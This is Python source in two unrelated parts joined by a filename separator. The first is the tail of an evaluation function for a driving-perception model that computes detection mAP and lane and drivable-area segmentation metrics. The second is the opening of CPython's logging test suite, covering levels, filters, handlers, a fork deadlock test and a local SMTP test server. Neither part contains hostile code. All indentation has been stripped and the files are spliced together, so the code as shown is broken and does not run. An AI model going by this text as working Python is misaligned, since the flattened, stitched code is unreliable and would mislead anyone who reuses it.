labels[:,1:5]=scale_coords(img[i].shape[1:],labels[:,1:5],img_gt.shape).round()
for cls,x1,y1,x2,y2 in labels:
label = 'bottle'  # hard-coded single-class label used for visualization
label_det_gt = f'{label}'
xyxy = (x1,y1,x2,y2)
plot_one_box(xyxy, img_gt , label=label_det_gt, color=colors[int(cls)], line_thickness=3)
if epoch % 1==0:
cv2.imwrite(save_dir+"/batch_{}_{}_det_gt.png".format(epoch,i),img_gt)
# Statistics per image
# output([xyxy,conf,cls])
# target[0] ([img_id,cls,xyxy])
for si, pred in enumerate(output):
labels = target[0][target[0][:, 0] == si, 1:] #all object in one image
nl = len(labels) # num of object
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if config.TEST.SAVE_TXT:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if config.TEST.PLOTS and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if config.TEST.SAVE_JSON:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if config.TEST.PLOTS:
confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
# n*m n:pred m:label
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
if config.TEST.PLOTS and batch_i < 3:
f = save_dir +'/'+ f'test_batch{batch_i}_labels.jpg' # labels
#Thread(target=plot_images, args=(img, target[0], paths, f, names), daemon=True).start()
f = save_dir +'/'+ f'test_batch{batch_i}_pred.jpg' # predictions
#Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
# stats : [[all_img_correct]...[all_img_tcls]]
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy zip(*) :unzip
map70 = None
map75 = None
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=False, save_dir=save_dir, names=names)
ap50, ap70, ap75,ap = ap[:, 0], ap[:,4], ap[:,5],ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95]
mp, mr, map50, map70, map75, map = p.mean(), r.mean(), ap50.mean(), ap70.mean(),ap75.mean(),ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
#print(map70)
#print(map75)
# Print results per class
if (verbose or (nc <= 20 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t_inf, t_nms, t_inf + t_nms)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if config.TEST.PLOTS:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
wandb.log({"Images": wandb_images})
wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]})
# Save JSON
if config.TEST.SAVE_JSON and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in val_loader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if config.TEST.SAVE_TXT else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
da_segment_result = (da_acc_seg.avg,da_IoU_seg.avg,da_mIoU_seg.avg)
ll_segment_result = (ll_acc_seg.avg,ll_IoU_seg.avg,ll_mIoU_seg.avg)
# print(da_segment_result)
# print(ll_segment_result)
detect_result = np.asarray([mp, mr, map50, map])
# print('mp:{},mr:{},map50:{},map:{}'.format(mp, mr, map50, map))
#print segmet_result
t = [T_inf.avg, T_nms.avg]
return da_segment_result, ll_segment_result, detect_result, losses.avg, maps, t
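# Note on the detection metric above (illustrative): a prediction is a true
# positive at IoU threshold t when its best same-class ground-truth match has
# IoU > t and that ground truth is not already claimed. For one prediction
# with best IoU iou_best, the corresponding row of `correct` is
#     correct_row = iou_best > iouv    # shape (10,), one flag per threshold
# and mAP@0.5:0.95 averages AP over the ten thresholds in iouv.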
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count if self.count != 0 else 0
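# Usage sketch (illustrative): AverageMeter keeps a count-weighted running
# average, which is how the losses and timings above are aggregated.
# meter = AverageMeter()
# meter.update(0.5, n=4)   # batch of 4 with mean value 0.5
# meter.update(1.0, n=2)   # batch of 2 with mean value 1.0
# meter.avg                # -> (0.5*4 + 1.0*2) / 6 ≈ 0.667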
|
test_logging.py
|
# Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
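#
# Illustrative sketch (stdlib only): once registered via logging.addLevelName,
# a custom level works like any built-in level. CustomLevelsAndFiltersTest
# below performs this registration in its setUp.
#
# logging.addLevelName(VERBOSE, my_logging_levels[VERBOSE])
# logging.getLogger('chatty').log(VERBOSE, 'emitted if effective level <= VERBOSE')
#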
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
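# (Illustrative note: CPython's logging module registers a callback via
# os.register_at_fork(after_in_child=...) that re-initializes handler locks
# in the child, so a lock held at fork time cannot deadlock the child.)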
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
